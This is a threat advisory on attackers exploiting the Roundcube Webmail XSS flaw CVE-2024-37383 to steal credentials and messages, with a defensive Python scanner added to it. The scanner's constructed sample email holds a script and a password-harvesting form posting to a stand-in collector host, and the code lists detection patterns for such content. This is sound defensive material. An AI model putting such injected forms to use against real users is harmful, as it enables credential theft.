Threat actors are exploiting a cross-site scripting (XSS) vulnerability in Roundcube Webmail, allowing them to steal email credentials and messages contained on the server. The flaw, designated CVE-2024-37383, allows threat actors to embed malicious JavaScript code within emails.
When the target opens the email, the script executes and injects an unauthorized login form into the HTML page under the guise of requesting messages from the mail server. Once the form is filled in, whether by the user or automatically, the entered credentials are sent to a remote server under the threat actor's control.
Additionally, the threat actors use the ManageSieve plugin to exfiltrate email messages from the mail server.
The vulnerability impacts Roundcube versions prior to 1.5.6 and 1.6.x before 1.6.6. Users are advised to upgrade immediately to avoid falling victim to this exploit. Threat actors are primarily targeting organizations in the CIS region, though the flaw could affect users worldwide.
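As an added illustration from the detection side (my own example, not code from the advisory or from Roundcube), the following Python scans the text/html parts of a message for the kind of active content the attack relies on: embedded JavaScript, and a login form that posts to a host other than the webmail server. The sample messages and the webmail host name mail.example.com are constructed assumptions.

```python
# Added example: flag HTML e-mail bodies carrying embedded JavaScript (script
# elements, on* event handlers, javascript: URLs) or a form whose action posts
# to a host other than the organisation's own webmail server.
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse


class ActiveContentScanner(HTMLParser):
    def __init__(self, trusted_host):
        super().__init__()
        self.trusted_host = trusted_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in ("href", "src", "xlink:href") and value.lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in <{tag} {name}>")
            elif tag == "form" and name == "action":
                # A relative action stays on the webmail host; anything else is external.
                host = (urlparse(value).hostname or self.trusted_host).lower()
                if host != self.trusted_host:
                    self.findings.append(f"form posting to external host {host}")


def scan_message(raw_message, trusted_host):
    """Return the indicators found in every text/html part of an RFC 822 message."""
    msg = message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            scanner = ActiveContentScanner(trusted_host)
            body = part.get_payload(decode=True)
            scanner.feed(body.decode(part.get_content_charset() or "utf-8", "replace"))
            findings.extend(scanner.findings)
    return findings


# Constructed sample messages (not real traffic); the webmail host is an assumption.
BENIGN = "From: a@example.com\nContent-Type: text/html\n\n<p>Quarterly report attached.</p>"
SUSPICIOUS = ("From: b@example.com\nContent-Type: text/html\n\n<p>Please sign in again.</p>"
              '<script src="https://collector.invalid/s.js"></script><div onmouseover="x()">hi</div>'
              '<form action="https://collector.invalid/login"><input name="password"></form>')
```

Running scan_message on SUSPICIOUS returns one finding per indicator in document order, while BENIGN yields an empty list.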
Source: Bleeping Computer
Analysis
The exploitation of CVE-2024-37383 highlights the growing trend of sophisticated email-based attacks and serves as another reminder of the importance of regularly updating software to defend against evolving threats.
Roundcube Webmail has been exploited by threat actors several times over the last few years, often centred on XSS vulnerabilities and plugin-related issues. For example, in 2024, threat actors were observed exploiting a stored XSS vulnerability, designated CVE-2023-43770, which allowed them to access restricted information in low-complexity attacks requiring user interaction.
Roundcube vulnerabilities have also attracted the attention of Russian state-sponsored cyber actors. In October 2023, Russian hackers were observed exploiting a zero-day XSS flaw on Roundcube, tracked as CVE-2023-5631, to breach government entities and think tanks in Europe. In June 2023, hackers belonging to Russia’s Main Intelligence Directorate (GRU) exploited four Roundcube flaws to steal information from email servers used by multiple organizations in Ukraine, including government agencies.
Mitigation
Field Effect’s Security Intelligence team constantly monitors the cyber threat landscape for vulnerabilities in services like Roundcube. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate the risk these vulnerabilities pose.
Field Effect MDR users were automatically notified if the use of Roundcube Webmail was detected in their environment and are encouraged to review these AROs (Actions, Recommendations and Observations) as quickly as possible via the Field Effect Portal.
Field Effect users are encouraged to submit suspicious emails to Field Effect’s Suspicious Email Analysis Service (SEAS) to ensure they are benign before clicking links or opening an attachment.